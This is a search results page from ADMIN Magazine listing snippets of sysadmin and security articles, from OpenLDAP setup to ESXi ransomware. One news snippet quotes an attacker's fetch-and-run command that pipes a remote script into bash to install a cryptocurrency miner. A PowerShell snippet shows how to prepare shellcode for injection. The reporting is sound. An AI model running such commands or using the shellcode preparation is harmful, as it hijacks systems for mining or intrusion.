Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (909)
  • Article (318)
  • News (106)
  • Blog post (4)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 94 95 96 97 98 99 100 101 102 103 104 105 106 107 ... 134 Next »

25%
OpenLDAP Workshop
11.06.2014
Home »  Archive  »  2014  »  Issue 21: Manag...  » 
Lead Image © tiero, 123RF.com
at the command line: $ sudo slappasswd -s secret {SSHA}f0pv70XFFox5UqKc6A4Uy39NcxkqcJbc The complete line returned will be needed later for the configuration file, so copy it to a temporary editor window
25%
Keeping Docker containers safe
13.02.2017
Home »  Archive  »  2017  »  Issue 37: Distr...  » 
Lead Image © Irina Tischenko, 123RF.com
of around 250MB to Amazon's S3 storage very effectively. A number of successful container technologies have been used extensively in the past, including LXC, Solaris Zones, and FreeBSD jails, to name
25%
PowerShell add-on security modules
04.10.2018
Home »  Archive  »  2018  »  Issue 47: Findi...  » 
| sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- This command string correctly prepares the -Shellcode parameter value. When passed to -Shellcode without specifying a process ID, the Invoke
25%
ESXi ransomware attacks
05.02.2023
Home »  Archive  »  2023  »  Issue 73: Datab...  » 
Photo by Afif Ramdhasuma on Unsplash
and criticized the payment of ransom across society [3]. Although many insurance companies will pay the ransom today, some providers have already explicitly ruled out payment. Of course, criminals are also
25%
News for Admins
30.01.2020
Home »  Archive  »  2020  »  Issue 55: AWS L...  » 
 
'curl -sL4 http://ix.io/1XQa | bash; (which downloads a bash script that would install the XMRig cryptocurrency miner). The issue was discovered by security firm Bad Packets LLC. Bad Packets also found
25%
Aligning filesystem partitions
20.03.2014
Home »  Archive  »  2014  »  Issue 19: Perim...  » 
Lead Image © Lucy Baldwin, 123RF.com
size. Ideally, limited read performance impact is experienced by applications as drives map 512-byte legacy requests on aligned 4KB reads internally [3]. However, that is no longer the case when I
25%
News for Admins
02.06.2020
Home »  Archive  »  2020  »  Issue 57: Artif...  » 
 
, and boot mode. The Turing Pi is capable of running Kubernetes and Docker Swarm, can be used as a home server or for cloud-native apps hosting, and can host K8S, K3S, Minecraft, Plex, Owncloud, Nextcloud
25%
Protect yourself from infected MS Office files
15.08.2016
Home »  Archive  »  2016  »  Issue 34: Softw...  » 
Lead Image © wamsler, 123RF.com
opening the file compromises the computer. The spread of malware or crimeware has not slowed down – on the contrary. Back in the early 1990s, the first tools that greatly facilitated the process
25%
News for Admins
28.11.2021
Home »  Archive  »  2021  »  Issue 66: Inci...  » 
 
technology and product officer, says, "SLE Micro is rapidly becoming a critical foundation of customers' digital transformation, as evidenced by a large U.S.-based systems integrator choosing SLE Micro
25%
Web applications with Julia
26.01.2025
Home »  Archive  »  2025  »  Issue 85: Monit...  » 
Lead Image © sony sivanandan, 123RF.com
examples created a slider in the Pluto notebook (Figure 3) with @bind x Slider(1:10) In HTML, the closest equivalent is: However, the two examples

« Previous 1 ... 94 95 96 97 98 99 100 101 102 103 104 105 106 107 ... 134 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice